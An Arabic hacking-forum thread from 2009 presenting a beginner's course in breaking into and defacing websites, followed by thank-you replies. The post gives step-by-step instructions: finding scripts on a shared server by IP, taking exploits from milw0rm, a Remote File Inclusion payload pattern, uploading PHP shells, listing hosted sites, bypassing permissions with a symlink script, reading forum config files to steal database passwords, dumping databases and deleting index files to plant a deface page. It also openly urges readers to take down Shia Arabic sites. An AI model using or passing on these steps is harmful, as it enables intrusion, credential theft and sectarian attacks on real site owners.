التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 10-03-2009, 09:35 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي دورة اختراق المواقع من الألف ............إلى الياء( بالصوره)


لفي بدايه حياتي بهكر المواقع هذا احد المواضيع الي استفدت منه
وحبيت انقله لكم مع حفظ الحقوق


فكرت في انزال كتاب خاص للمبتدئين فقط
لأني عانيت في بدايتي كثير في امور اختراق المواقع
كنت اسئل اقول وش معنى شل وشلون ارفعه وش معنى سكريبت وش معنى
ثغره وكيف اعرف اذا فيه ثغره او لا
اسئله كثير عانيت منها لكن بعد ماتعمقت في عالم الهكر وجدت ان كل
المبتدئيين يسئلون مثل اسئلتي هذي واكثرهم متذمر من اختراق المواقع
يقولون لصعوبته بس رأيت انه سهل جداٌٌ جداٌٌ
كثير من المبتدئيين يقولون مافي شروحات في المواقع لمبتدأ مثلي
يامخاوي مايعرف وش معنى سيرفر وشلون تبيه يرفع شل
طيب انا قلت هالكتاب يكون كامل عن اختراق واستهداف موقع يعني في
راسك موقع اقرأ هالكتاب وطبق معي وا ثم وا ثم وا لتخترق أي موقع يطب براسك
بس ركز
١. ماهو الشل؟
٢. ماهي الثغرات؟
٣. ماهي خطوات اختراق موقع؟
٤. وكيف نرفع الشل؟
٥. وكيف نبحث عن سكريبت مصاب؟
٦. وعدد كبير من السكريبتات المصابه مع التطبيق عليها
٧. وش نسوي بعد مانرفع الشل؟
٨. كيف نرفع اندكس الاختراق؟
٩. كيف افتح موقع خاص بي؟
ftp ١٠ . شرح لبرنامج
١١ . بعض الحيل لأختراق سيرفر او موقع معين
وانا أخلي مسؤليتي من أي شخص يستخدم هذا الكتاب ضد أي
موقع مسلم
لكن موقع عربي شيعي فيه اغاني فنا اتمنى منكم الا تبقونه
على هذه الشبكه العنكبوتيه
وانا اول من يساعدكم في هذا الشئ
وقبل لأبدأ بأول خطوه اقرأ هذا الجدول زين واحفظه لأن فيه
كلمات راح تصادفنا كثير وماراح نفهم معناها لو ماقرينا
هالجدول
انا ماراح اكتب تعريف كامل انا بكتب الي ابيك تفهمه بس
والباقي ولايهمك منه شئ
سيرفر/ كمبيوترذو مواصفات قويه من ناحية سرعة المعالج
والأداء وسرعة اتصال عاليه
وهذا هو الي يكون داخله المواقع وكل المواقع بمجلد
home اسمه
يعني لو قدرت ترفع شل على أي موقع بسيرفر راح
تقدر تتحكم بكل المواقع الي على السيرفر
أي خطأ في الملف نعتبره php
سكريبت/ ملف مكتوب بلغة
ثغره ونخترق عن طريقها
الثغره /عباره عن خطأ برمجي في السكريبت
الاستغلال/عباره عن كود يقوم بأستغلال الخطأ البرمجي
(استغلال الثغره)
الفايل انكلود/ نوع من انواع الثغرات وهو من اخطر انواع
الثغرات
وتعتبر الفايل انكلود اسهل ثغره واخطر ثغره


يعني لازم تفهمه وتحفظه ◌ الي مكتوب بلأحمر مهم جدا
لاتستصعب شئ من البدايه كل شئ سهل بس ركز
واوعدك بعد ماتكمل قرايت هالكتاب تكون فاهم كيف تخترق
وراح تقدر تخترق بعد هالكتاب
راح نبدأ بأول خطوه
انا ماراح اشرح شرح علمي كامل انا راح اكتب الي اشوفه يفيد
المبتدأ وراح ابتعد عن الاسلوب العلمي الي يبعد المبتدأ عن
جو الموضوع ويخليه يستصعب الهكر بصفه عامه
وراح نبدأ بأول خطوه
ماهو الشل؟
(php) الشل عباره عن ملف يتم كتابته بلغة البي اتش بي
ويقوم هذا الملف بتوجيه اوامر لسيرفر لفتح مجلد معين او رفع
اندكس اختراق او أي شئ اخر تريد ان تعمله فبهذا الملف تعمل
أي شئ تريد بسيرفر...
هذا الشل يتم رفعه عن طريق الثغرات الموجوده بسكريبتات
المركبه بالمواقع
هذا اهم شئ لابد انك تعرفه عن الشل وهذا انت عرفته
ننتقل للخطوه الثانيه
ماهي الثغرات؟
الثغرات هي اصعب شئ في الهكر لابد ان تتعمق فيها اكثر
وبرفق كتاب هذا الباب خاص عن الثغرات
**والثغرات تحتاج الى انسان يتحلى بصبر**
◌ ابيك تفهم بلأول نقطتين مهمه جدا
لما تبي تفتح لك موقع تروح تدور شركة استضافه ·
شركة الاستضافه هذي يكون عندهم شئ اسمه سيرفر ·
السيرفر يكون على كمبيوتر نظامه لينكس مو زي انظمتنا
ويندوز
نظامهم لينكس وهو اسرع بكثير من الويندز واقوى منه
^_*
كل سيرفر يكون بداخله مواقع
في غلطه كثير من المبتدئين يقع بها وهو لما يبي يرفع شل
<<بعد قليل راح افهمكم على طريقة رفع شل
vb انه لما يبي يرفع شل يروح يدور لثغرات المنتدى
او السكريبتات المركبه على الموقع
وفي الاخير اذا مالقي ثغره يقول يالله مأقدرت اخترق الموقع
لا ياحبيبي *_^
انت لما تبي تخترق موقع تطلع أي بي السيرفر الي عليه الموقع
لأن لاتنسى اني قلت لكم ان كل موقع يكون داخل سيرفر وكل
سيرفر يكون داخله مواقع كثيره
وانت لما ترفع شل على أي موقع موجود بسيرفر راح تتحكم
بسيرفر كله والتحكم بسيرفر كله يعني التحكم بالمواقع الموجوده
بسيرفر
والتحكم كما قلنا بلأول يكون عن طريق الشل
اذا مافهمت العباره الي فوق فقرها اكثر من مره وراح تفهم
بس أهم شئ التركيز *_^
النقطه الثانيه الي حبيت اقلكم عليها ·
ان الثغرات موجوده بشئ اسمه سكريبت
بتسئلني وتقولي يامخاوي وش السكريبت ؟
انا اقلك حبيبي وش السكريبت
(php) السكريبت عباره عن ملف يتم كتابته بلغة البي اتش بي
وكل صاحب موقع مركب سكريبتات بموقعه
بتقلي ليه يامخاوي اصحاب المواقع يركبون سكريبتات وش
الفائده منه؟
انا اقلك
php الحين السكريبت كما قلت عباره عن ملف مكتوب بلغة
يقوم هذا الملف بخدمة اصحاب المواقع ويسهل لهم امور كثيره
مثل المنتدى هو عباره عن سكريبت
وانت تتصفح بعض المواقع تلاقي مكتوب في رئيسية ◌ احيانا
ٌٌ
الموقع
مركز التحميل
او
ألبوم الصور
او
سجل الزوار
او
مكتبة البرامج
وغيرها غيرها الكثير
وراح اكتب انواع كثيره من السكريبتات المشهوره عشان تقدر
تبحث عنها وترفع شل عن طريقها في هذا الكتاب
الحين راح استعرض لكم بعض صور السكريبتات عشان تفهمها
زين
لأني ماودي اتعدا خطوه الا وانا متأكد انك فاهم كل شئ

لما تظغط على مثلاٌ مكتبة البرامج تلاقي برامج كثيره
هذا سكريبت
انا قلت انه يسهل على اصحاب الموقع
شفتم كيف صاحب الموقع اصلا ماحمل ولا رفع برنامج بس رفع
السكريبت والسكريبت بداخله البرامج *_^
الي يهمنا من الكلام هذا كله ان الثغره توجد داخل السكريبت
ويبي لنا نستغلها
عشان نقدر نرفع شل
الثغره عباره عن خطأ برمجي
وحنا لازم نجيب كود استغلال عشان نقدر نستغل هذا الخطا
ونرفع شل
وراح نتطرق لثغرات والاستغلال اكثر بعد اشوي
الثغرات انواع
فايل انكلود
SQL
XSS
وانواع كثيره لكن هذي اهم ثلاثه واشهرها
واخطرها واسهلها الفايل انكلود
وهي نادره هاي الايام

وبااسوورد فك الظغط
كلمة مرور فك الضغط
hack15
ماهي خطوات اختراق موقع؟وكيف نرفع الشل؟
خطوات اختراق موقع هي الاتي
اول شئ حدد الموقع الي تبي تخترقه

اول شئ نطلع أي بي السيرفر
وهذا شرح بصور لأستخراج أي بي السيرفر الي مركب عليه
الموقع
اول شئ نظغط على ابدأ بعدين تشغيل ونكتب
الامر
Cmd
ونظغط انتر

بعدين تفتح لنا شاشه سوداء

شوفوا بعد ماكتبنا
Ping عفوا ,,, لايمكنك مشاهده الروابط لانك غير مسجل في المنتدى .. [ للتسجيل اضغط هنا ]

وظغطنا انتر وش صار

طريقة نسخ الاي بي لتسهيل عليكم
بتكون بالخطوات هذي
اول شئ حط الماوس على الشاشه السوداء الي فيها الاي بي
اظغط الماوس اليمين
بيجيك خيارات اول خيار
الي هو وضع علامه اظغط عليه
بعدين حدد على الاي بي
بعدين


الحين عرفنا نطلع الاي بي وننسخه<<والله الي يسمعه يقول
مخترع صاروخ*_^
المهم نروح نبحث عن السكريبتات المركبه على السيرفر
بتقلي يامخاوي وشلون ابحث عن السكريبتات المركبه في السيرفر
انا اقلك على الطريقه
روح موقع
live.com

في خانة البحث نكتب الاي بي بهذي الطريقه
ip:75.126.81.157

ip: اذا كتبتم كذا 75.126.81.157
فراح يطلع لكم كل المواقع الي على السيرفر
واذا تبي تبحث عن سكريبت معين
فتكتب اسم السكريبت بعد الاي بي
مثلا تبي تبحث عن سكريبث
اسمه
MKPortal
فيكون كتابة البحث عن هذا السكريبت بهذي الطريقه
ip:75.126.81.157 MKPortal
وهذي صوره لتوضيح اكثر

والان راح اكتب لكم سكريبتات خطيره لما تبي تخترق موقع
ابحث عنها
◌ علما
ان كل كلمه راح اكتبها تحت كل ماعليك ان تضعها بعد
رقم أي بي السيرفر
تبحث وماتلاقي يطلع لك شئ هذا معناته ان مافي ◌ احياناٌ
ٌ
سكريبت مركب على أي موقع بسيرفر بنفس الاسم الي بحثت
عنه
powered by
لأستخراج كامل السكريبتات المركبه على السيرفر
Warning
لأستخراج الأخطأ
Upload
هذا لأستخراج مركز التحميل
ومركز التحميل له طرق كثيره جدا
منها
بالعربي اكتب بعد رقم الاي بي
مركز التحميل
وانا افضل البحث عن السكريبت بأسمه العربي
لأن اكثر اصحاب المواقع يشيل اسم السكريبت من اخر الصفحه
ويكتب جميع الحقوق محفوظه وقتها ماراح يطلع
لهذا اكتب اسمه بالعربي اشوف انه افضل بكثير
MKPortal
لات  للبحث عن ا
aspjar guestbook
للبحث عن سجل الزوار
او تكتب بالعربي سجل الزوار وراح تجيك
لسجل الزوار ◌ ايضا
XP Book
وهذا سكريبت خطير
images ٤
Images
Glary
Downloads
PhpBB
Powered by : Down Asaher v 2.5
هذي هنا سكريبتات خطيره
بالعربي اكتبوا وانا افضل ◌ ايضا
أٌلكتابه بالعربي مثل ماقلت
مثل كتابة
بعد الاي بي
سجل الزوار
مكتبة البرامج
مركز التحميل المجله
البوم الصور
وغيرها غيرها الكثير
ابحث وراح تجد اكثر من سكريبت مصاب بكل سيرفر
وكل سكريبت تلاقيه روح ابحث عن ثغراته بطريقتين
الي راح احطه لك الان الاوله موقع
/http://www.milw0rm.com
والثانيه عن طريق أي موقع بحث والطريقه موجوده تحت بصور
وراح تقدر ترفع شل بأذن الله
مثلا تقول لي يامخاوي انا لقيت سكريبت
MKPortal اسمه
من وين اجيب الأستغلال حقه
انا اقلك حبيبي
في مواقع مختصه بثغرات السكريبتات كل يوم ينزلون اكثر من
اربعه ثغرات
طيب انا اعطيك رابط الموقع اول شئ
/http://www.milw0rm.com
وهذي هنا صوره للموقع وفيها بعض الشروحات

فتحت لنا هالصفحه (search) طيب بعد ماظغطنا على بحث

وبعد كتابة اسم السكريبت المصاب في الفراغ
طلع لنا الثغرات وهذي صوره من الي طلع لنا

Remote File احنا راح نجرب اول ثغره وهي من نوع
Inclusion
◌ جدا ◌ لأنه خطيره وسهله جدا
نظغط على اول ثغره
MKPortal NoBoard Module (BETA)
Remote File Inclusion Vulnerability
MKPortal
هذا اسم الثغره

في ناس يقول كيف اعرف الاستغلال
أستغلال ثغرات الفايل انكلود
دائما يجي تحت او بجنب كلمة
Example
او يجي اخره
shell.txt
او[ shell ]?
عرفنا الاستغلال بقى علينا نعرف وش نسوي
قبل لاتعرف بعض المصطلحات المهمه في هذا الاستغلال

site
]/mkportal/include/user.php?MK_PATH=[ shell ]?
هذي هنا بدلها تحط رابط الموقع >>[site]
مثلا نقول ان الموقع
رابطه كذا

هذا السكريبت المصاب >>mkportal
mkportal/include/user.php?MK_PATH
هذا الاستغلال حق الثغره
=[ shell ]?



طيب نفترض ان لقيت ثغرات في المليورم لكن مو منوع فايل
انكلود
فقدامك طريقتين يأما تروح تبحث عن شروح عن طريقة استغلال
نوع ثغره معينه
ويأما تروح قوقل
وراح تلاقي شروح عنها مثل
تروح قوقل وتكتب

الثغرات كثيره بكل سكريبت أنت ابحث وابتعد عن اليئس
لعلك تواجه صعوبه في اول مره تستهدف موقع لكن المره
ومايحتاج له ◌ الثانيه والثالثه خلاص تحس ان الامر سهل جدا
ٌٌ
شروحات ولا شئ...
واسهل سيرفر راح تقدر ترفع عليه شل هو السيرفر الي مواقعه
كثير والسكريبتات المركبه على المواقع كثيره
وقتها بس ابحث عن أي سكريت سهل واخترق وانا اخوك
^_*
تلاقي سكريبت وتبي تطلع ثغرات جديده انت تروح ◌ واحيانا
ٌٌ
JAAScoisX- تحمل السكريبت في جهازك ووبرنامج اسمه
يطلع لك الاخطاء الحاصله بسكريبت وانت عليك Code
الاستغلال
انا ماشوف هالطريقه له داعي فهمها بنسبه للمبتدئيين لأنه لو
تعمق فيها وهو لسى مبتدأ راح يحس الهكر صعب
لهذا اتركها بعد فهمك لكل مافي هذا الكتاب وقدرتك على
التطبيق وقتها تعلم باقي العلوم المتطوره
وانا مؤلف هالكتاب على اساس ابتعد عن شئيين الاول طولت
الكلام الي مالها داعي
الثاني ابعاد المبتدأ عن الامور الصعبه والكلام الي يخليه يبطل
يدخل في عالم الهكر
نكمل شرحنا
بعد ماحطيت استغلال ثغرة
Remote File Inclusion
وحطيت رابط الشل خل نشوف الشل بيفتح لنا او لا
اذا فتح معناتها ان الثغره مو مرقعه بسكريبت

تم رفع الشل ولله الحمد
بعض المبتدئين يمر بأشياء منها اول مايحط رابط الشل
والاستغلال يجيه صفحة خطأ او يحوله الرابط للمنتدى او رئيسية
الموقع
وغيرها...الخ...!
هنا راح اقلك ان الثغره مرقعه يعني ماتقدر تخترق عن طريقها
دور سكريبت غيره
طبق mkportal وبنفس الطريقه الي طبقناها على السكريبت
على أي باقي السكريبت
من ناحية البحث عن السكريبت في السيرفر
ومن ناحية البحث عن استغلالها
mkportal وكل شئ طبقه بنفس ماسويت في هذا السكريبت
وارفع شلك وراح تصل للي تبغاه في اقل من مما تتوقع بس
التركيز اهم شئ في الهكر كله *_^
طيب بتقولي يامخاوي الحين انا رفعت شل وش اسوي بعدين ان ا
بقلك الان وش تسوي
لهذا بغير هذا الشل r اول شئ انا احب شل 57
r وبحط 57
اول شئ تسويه هو انك تستعرض كل المواقع الي على السيرفر
◌ وقبل لاتستعرضها ابقلك اشياء مهمه جدا

وراح اشرح بعض الاشياء المهمه لكي تفهمها زين
safe_mode: OFF
السيف مود=الوضع الامن
وقتها تقدر تلعب بسيرفر بكيفك off اذا كان اوف
بس لما تجي تلاقي مكتوب
safe_mode: on
وقتها يبي لك تتخطى الوضع الامن
وانا دامي وضعت هذا الشرح للمبتدئيين فعناتها لايهم هذاي
بداية أي واحد
ولكن لما تريد تتخطى الوضع الامن فتلاقي شروحات كثير
وبالفديو كمان
^_*
اسم مستخدم الموقع
كل موقع داخل السيرفر له اسم مستخدم خاص به
وبهذا الاسم تتنقل داخل السيرفر مو برابط
الصلاحيه
الصلاحيات انواع
وهذا مدير السيرفر كامل يعني يتحكم بكل شئ بكيفه Root
يحذف ويضيف ويعدل كل شئ بيده
هذا اسم مستخدم الموقع User
وهو بأمكانه حذف تعديل اضافة كل شئ يريد بموقعه بس
user يعني لو رفعت شل يوم من الايام ولقيت صلاحيتك
تقدر تسوي أي شئ بالموقع الي انت به بس مواقع ثانيه على
نفس السيرفر ماتقدر تسوي فيها شئ مره
في هذي الصلاحيه تقدر تعدل وتحذف وتنسخ وتسوي Nobody
لدات المصرحه تصريح ٧٧٧  الي تبي في ا
لدات الغير مصرحه بتصريح ٧٧٧ ماتقدر تعدل فيها ولا  وا
تقدر تسوي شئ بها مره
يعني زي انا الحين في الشل هذا صلاحيتي
Nobody
ومعناها زائر,
طيب الحين حنا رفعنا شل وعرفنا صلاحيتنا وعرفنا مكان
تواجدنا بسيرفر بقي علينا نعرف وشلون نطلع المواقع الي
بسيرفر
نطلعها بهذا الامر
ls -la /etc/valiases
نحط هذا الامر في مكان الاوامر الي ذكرته لكم فوق
ونظغط انتر ويفتح لنا مربع فوق كبير موجوده به المواقع وهذي
صوره راح تبين لك الوضع كامل
r ,راح استخدم في الباقي شل 57
لسهولته

طيب نختار موقع لننتقل له
rw-r--r-- 1 afaakco mail 15 Sep 11 17:57 -
aafaak.com
هذا هنا السطر فيه رابط الموقع واسم المستخدم والصلاحيه
يهمنا اسم المستخدم ناخذه وهو
Afaakco

لما نبغى ننتقل نحط في سطر تواجدك بسيرفر
هالأمر
/home/????/public_html/
هذا مجلد داخله المواقع Home
؟؟؟<<بدل علامة الاستفهام حط اسم مستخدم الموقع الي تبي
تنتقل له
هذا كل مايهمك ودامنا نبي ننتقل لموقع اسم مستخدمه
Afaakco
فبيكون الأمر هكذا
/home/Afaakco/public_html/
خل نشوف الحين الصوره هل تم النقل ام لا

تلاقي كتابات باللوان r وعشان تتأكد ان تم النقل في شل 57
الاحمر اعلى الشل اخر سطر فيها هو مكان تواجدك *_^
Nobody طيب دام صلاحيتك
وقلنا ان هالصلاحيه مايمديك تسوي شئ ماغير تتنقل وتشوف
اما تحذف تعدل ترفع ماتقدر غير في مجلد تصريحه لازم يكون
٧٧٧
وحنا نبي نرفع اندكس اختراق
وش السواه ؟؟
انا اقلكم وش السواه
نروح نبحث عن مجلد تصريحه ٧٧٧
بتقلي كيف





اول شئ راح اشرح واكمل الاختراق العشوائي داخل السيرفر
بعدين راح اشرح استهداف موقع معين داخل السيرفر
اول شئ اذا بغيت تبحث عن مجلد تصريحه
٧٧٧
فعليك البحث في جميع المواقع الي بسيرفر مو بس موقع واحد
وراح تقلي يامخاوي المشكله ان التصاريع مو مكتوبه ارقام يعني
مو مكتوب ٧٧٧
وش يدريني
انا اقلك وشلون تعرف
لد الي تصريحه ٧٧٧  ا
تكون مكتوبه صلاحيته بهذي الطريقه ◌ دائما
Drwxrwxrwx
لد تصريحه ٧٧٧  اذا لقيت هالكلمه اول سطر اعرف ان ا
advs طيب انا لقيت مجلد اسمه

لد ليتم النقل  يعني في المكان الي قلت نحط به اسم
كان مكتوب
home/yamnaty/public_html/
حنا بس نضيف عليها
advs
يعني بيكون كذا
home/yamnaty/public_html/advs
وخلاص اضغط انتر وتلاقي نفسك انتقلت للمجلد الي تبيه
لد هذا  بعدين ارفع اندكسك او أي شئ تبي في ا
طيب لو تبي تخترق موقع معين في السيرفر
Nobody في طريقتين الاولى تتطى صلاحية
وهذا شرح هنا لتخطي صلاحية يوزر
اول شئ ارفع هالملف بجهازك وفك الظغط عنه وحط المبلف الي
sym4.php داخله

فوق شرح كامل لأستخراج مجلد تصريحه ٧٧٧ والانتقال له بعد
بعد ماتنتقل للملف كما موضح لكم بلأعلى
داخل الشل اظغط على استعراض تابع معي الشرح

بعدين اظغط رفع تلاقي الملف ارفع خلاص شوفوا معاي

طيب لازم نستعرض الملف الان بتقولي كيف نستعرضه يامخاوي
اانا اقلك حبيبي وشلون نستعرضه

طيب قلت لكم ان هذا مكان تواجدنا
home/yamnaty/public_html/advs/
هو اسم home وقلت لكم في اول الكتاب ان بعد كلمة
مستخدم الموقع الي نتنقل به طيب اسم المستخدم غير عن رابط
الموقع اجل لازم نجيب رابط موقع حق اسم المستخدم هذا
yamnaty
اول شئ في مربع الاوامر
نضع هذا الامر
ls -la /etc/valiases
ثم انتر
بعدين يجينا في المربع الكبير روابط المواقع في اخر كل سطر
واسامي المستخدمين وهذي اكيد انتم فهمتوها في اول الكتاب

طيب عرفنا ان هذا رابط الموقع
yamnat.net
طيب نبي ندخل على الي رفعناه قبل اشوي وش نسوي
لو تلاحضون في مكان تواجدنا
/home/yamnaty/public_html/advs
لد الي رفعنا به الاداه  هذا ا >>Advs
لد اول  يعني لازم اجل ندخل على ها
بيكون الرابط كذا
www. yamnat.net/Advs
Advs وبعد كلمة
نحط اسم الملف الي نبي نستعرضه الا وهو
Sym4.php

شوفوا ھذا ھو الملف فتح معنا



خلاص انتهينا من شرح تخطي صلاحية يوزر
عشان تقدر تتحكم في الموقع الي تبيه براحتك
طيب مثلا
في موقع ماتبي غيره من السيرفر وتبي ترفع
اندكس اختراقك في المنتدى حق الموقع
أول شئ طلع ملف اسمه الكونفق
ملف الكونفق هذا الملف اهم شئ في منتدى أي شخص
لأن لو طلعت المعلومات الي فيه تقدر تنسخ باك اب للموقع
وتقدر بعد تدخل لوحة تحكم المنتدى بسمه وهو مايدري تقدر
ترفع صفحة اختراق في المنتدى
أي شئ تبيه تقدر
طيب الحين متشوق تقول طيب كيف اطلعه يامخاوي ؟
انا اقلك حبيبي
حط في مكان الاوامر بشل هذا الامر
cat /home/???/public_html/vb/includes/config.php
؟؟<<هذي هنا بدلها تحط اسم مستخدم الموقع
وخلك معي راح احط شرح بصور عشان تفهم اكثر

طيب بتقول لي طلعته يامخاوي وش اسوي بعد ؟
انا اقلك وش تسوي الان يهمنا من ملف الكونفق كله اربع او
خمس اسطر وانا اقلك الان وشلون تجيبها
$config['Database']['db****
هذا سطر اسم قاعدة البيانات
config['MasterServer']['user****'
هذا السطر يدل على اسم المستخدم لقاعدة البيانات
هذا السطر يدل على كلمة مرور قاعدة البيانات
$config['MasterServer']['password'
هذا السطر يدل على رابط لوحة تحكم المنتدى
config['Misc']['admincpdir'
هذي في نظري هي اهم شئ
طيب الان اقلكم وش نسوي ووشلون نطلعها
نروح على الكونفق وداخله نظغط
control+F
بيجينا هالمربع

تكتب فيه الأشياء الي تبي تطلعها وانا كاتبها لكم فوق
وبعطيكم مثال بصوره على واحده منها

طيب بعد ماطلعت كامل المعلومات الي احتاجها من ملف
الكونفق
وحطيتها في مستند نص عشان ماتنساها
بقى علي
اروح يم شل
CH99
انا افضله عن الشلات الباقيه في عملية نسخ الباك اب وعملية
رفع الاندكس
بعد ماندخل على شل
CH99
نلاقي خيار فوق وهو
SQL
نظغط عليه


ضع هنا اسم مستخدم قاعدة البيانات userneme
<<تحصلها بكونفيق المنتدى
ضع هنا كلمة مرور قاعدة البيانات << password :
تحصلها بكونفيق المنتدى
ضع هنا اسم قاعدة بيانات المنتدى << Database :
تحصلها بكونفيق المنتدى
السيرفر اللي عليه المنتدى ip ضع هنا عنوان Host
اذا كنت على نفس السيرفر
خله مثل ماهو عليه >> localhost . ضع عبارة
ضع هنا منفذ الاتصال بقواعد البيانات وغالباً ما port : في خانة
يكون ٣٣٠٦ . يفضل ان تتركه مثل ماهو عليه
بعدين اظغط على
connect ر
الصور هذي الي الان راح استعرضها تحت لكم من احد دروس ابو
عابد

اذا تم الاتصال بنجاح بتطلع لك هالشاشة واضغط على زر
dump -: لنسخ القاعدة كما بالصورة

-: التالية بعدها راح تفتح لك الصفحة


اضغط على زر dump شاشة حفظ الباك اب سوي وراح تطلع لك
حفظ حفظ
وانتظر لين يحملها كلها بجهاز ان شاء

طيب بنسبه لرفع اندكس الاختراق فبيكون
في طريقتين
اول طریقھ
اول شئ تنتقل لمجلد في بي ویكون امر الانتقال
/home/?????/public_html/vb
لد في بي  ?<<بدلها حط اسم مستخدم الموقع الي تبي تنتق
بعدين القيام بحذف ملف الاندكس حق المنتدى ووضع اندكسك
مكانه
ويكون الامر بوضع هذه الكلمه في مربع الاوامر ثم انتر
Rm index.html
تلاقيه انحذف


امر حذف ملف معين
Rm ****
**** حط بدال
اسم الملف الي تبي تحذفه
روح تحت Vb من داخل مجلد Index.html بعد ماتحذف
تلاقي مكتوب استعراض اظغط على استعراض وارفع ملف
الاندكس حقك
Html بصيغة
روح يم المنتدى تلاقيه ارفع أندكسك على المنتدى كامل
والف الف الف مبروك عليك المنتدى *_^
وفي طريقه ثانيه هي عن طريق تغير مابداخل قالب فور هوم
لكن هذي مأفضلها لأنها تخلي صفحة اختراقك على رئيسية
المنتدى بس
تشفير الكونفق
الجدار الناري
تغيير مسار الكونفق
من اصحاب ◌ هذي مشكلات قد تواجهنا بس لأنها قليل جدا
ٌٌ
الموقع من يعمل هذه الاشياء ولأن هذا الكتاب اعددته للمبتدأ.
وشكرا لكم وانتمنا ما اكون طولة عليكم
والسلام عليكم ورحمة الله وبركاته
اخوكم اسير فى مصير






],vm hojvhr hgl,hru lk hgHgt >>>>>>>>>>>>Ygn hgdhx( fhgw,vi)

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 10-03-2009, 09:56 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية Antivirus7
 

 

 
إحصائية العضو







Antivirus7 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Antivirus7 is on a distinguished road

افتراضي


يسرني اني اول من يرد على الموضوع المميز
تحياتي لك اخي الحبيب
جزاك الله خيرا
في انتظار جديدك

التوقيع


http://www.1ss1.com/data/2010/1ss1_13125526341.gif

http://www.hafr-albatin.com/rmden/e9da07c793.gif
Volcano
Sniper Gaza
The Best Friends 4 ever

.: لآ لإخترآق المسلمين :.
و تذكرو قول النبي صلى الله عليه و سلم
.: (كل المسلم على المسلم حرام دمه وماله وعرضه)
:.

 

   

رد مع اقتباس
قديم 10-11-2009, 07:18 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية TETMOR
 

 

 
إحصائية العضو







TETMOR غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى TETMOR

 

 

إحصائية الترشيح

عدد النقاط : 10
TETMOR is on a distinguished road

افتراضي


meeeeeeeeeeeeeeeeeeeeeeeeeerci

   

رد مع اقتباس
قديم 10-26-2009, 06:07 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية بيسووو
 

 

 
إحصائية العضو





بيسووو غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
بيسووو is on a distinguished road

افتراضي


ضراااحه استفدفت كثيرررر من موضوعك
والله يدك الف عااااافيه

   

رد مع اقتباس
قديم 10-26-2009, 11:43 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية M!M0
 

 

 
إحصائية العضو






M!M0 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
M!M0 is on a distinguished road

افتراضي


مشكور أخي لقد إستفدنا بالشرح

التوقيع


اعذروني لقلة قلامي..فالمدرسة تدمرني

http://img337.imageshack.us/img337/9193/kya54442.gif


M!M0==>معقد نفسيا ، مشتت ذهنيا منتحر علميا ، متورط عائليا مطلوب امنيا...,وماذا بعد؟

 

   

رد مع اقتباس
قديم 10-27-2009, 03:32 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية THE WARRIOR
 

 

 
إحصائية العضو






THE WARRIOR غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
THE WARRIOR is on a distinguished road

افتراضي


الله شرح رائع شكراااا ليك على المجهود الرائع الى بدلته

انتا كتبة الموضوع بلون الاسود خلفية المنتدى هههههههههههههههههههههههه

تقبل مرورى

التوقيع

we will never walk AlOne

 

   

رد مع اقتباس
قديم 10-27-2009, 01:37 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


مشكورين على مروركم :$

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 10-30-2009, 01:41 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية riddick
 

 

 
إحصائية العضو





riddick غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
riddick is on a distinguished road

افتراضي


مشكور أخي

   

رد مع اقتباس
قديم 11-01-2009, 11:03 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية gr-group
 

 

 
إحصائية العضو





gr-group غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
gr-group is on a distinguished road

افتراضي


موضوع اكتر من رائع
في انتظار جديدك

   

رد مع اقتباس
قديم 11-05-2009, 08:19 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية dr.faoo
 

 

 
إحصائية العضو





dr.faoo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dr.faoo is on a distinguished road

افتراضي


شكر ك أوي

   

رد مع اقتباس
قديم 11-06-2009, 03:30 AM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
إحصائية العضو





ولد النعيريه غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ولد النعيريه is on a distinguished road

افتراضي


مشكووووور

   

رد مع اقتباس
قديم 11-06-2009, 06:54 AM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية tktk
 

 

 
